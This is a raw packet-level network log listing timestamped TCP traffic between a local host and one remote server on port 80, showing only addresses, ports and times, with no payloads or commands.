Aug 29, 2024 15:42:57.492353916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492371082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492383957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492383957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492388964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492405891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492423058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492429018 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492434978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492446899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492448092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492448092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492458105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492468119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492486954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492496014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492496014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492501974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492513895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492518902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492523909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492532969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492542028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492552042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492556095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492557049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492556095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492568970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492578030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492590904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492592096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492592096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492598057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.492635012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.492635012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493112087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493122101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493129969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493134975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493144035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493156910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493168116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493177891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493179083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493191957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493196011 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493206978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493242025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493247986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493256092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493257046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493264914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493264914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493264914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493282080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493292093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.493309021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493309021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.493335962 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574114084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574143887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574155092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574163914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574174881 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574186087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574196100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574229956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574275970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574289083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574301004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574310064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574315071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574323893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574333906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574337006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574345112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574383974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574414968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574420929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574443102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574454069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574467897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574479103 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574480057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574493885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574501038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574525118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574548006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574548960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574561119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574593067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574635029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574646950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574660063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574670076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574681044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574702978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574702978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574748039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574752092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574764013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574774981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574784040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574793100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574840069 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574840069 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.574954033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574964046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574971914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574982882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.574994087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575002909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575009108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575011969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575022936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575025082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575026035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575035095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575038910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575047016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575057030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575088024 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575118065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575129986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575156927 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575156927 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575258017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575268984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575278044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575287104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575298071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575306892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575318098 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575319052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575331926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575341940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575342894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575354099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575364113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575381994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575381994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575381994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575407982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575428009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575521946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575532913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575541973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575551987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575562000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575572968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575582981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575591087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575591087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575596094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575608969 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575609922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575623989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575639009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575649977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575649977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575709105 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575849056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575860023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575869083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575885057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575890064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575896025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575906992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575906992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575918913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575932980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575933933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575947046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575956106 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575964928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575964928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.575964928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.575978041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576018095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576030970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576041937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576049089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576052904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576097012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576097012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576257944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576268911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576277971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576288939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576299906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576311111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576313019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576323032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576334953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576344967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576348066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576348066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576356888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576368093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576371908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576380014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576390982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576392889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576405048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576416016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576428890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576461077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576461077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576471090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576486111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576522112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576522112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576574087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576585054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576595068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576606035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576616049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576620102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576626062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576639891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576648951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576664925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576664925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576714993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576720953 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576728106 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576745033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576756001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576759100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576766014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576812983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576812983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576848030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576857090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576865911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576895952 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576921940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.576934099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576945066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576955080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576966047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.576987982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.577071905 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661295891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661338091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661350012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661380053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661391973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661398888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661411047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661427975 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661438942 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661484003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661489010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661494970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661506891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661546946 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661565065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661626101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661638021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661647081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661658049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661669970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661680937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661688089 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661700010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661701918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661712885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661740065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661740065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661765099 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661777973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661789894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661870003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661878109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661895037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661906004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661916018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661935091 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661952972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661962986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661964893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.661973000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661982059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.661992073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662033081 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662033081 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662147045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662163019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662173986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662184000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662201881 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662208080 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662211895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662218094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662225962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662240028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662251949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662261009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662271023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662272930 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662272930 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662281990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662293911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662317991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662317991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662337065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662337065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662395000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662545919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662555933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662565947 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662581921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662596941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662607908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662615061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662615061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662621021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662636042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662640095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662651062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662662983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662669897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662669897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662679911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662691116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662703991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662710905 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662710905 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662719965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662758112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662770987 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662801981 CEST	80	49704	185.215.113.100	192.168.2.5
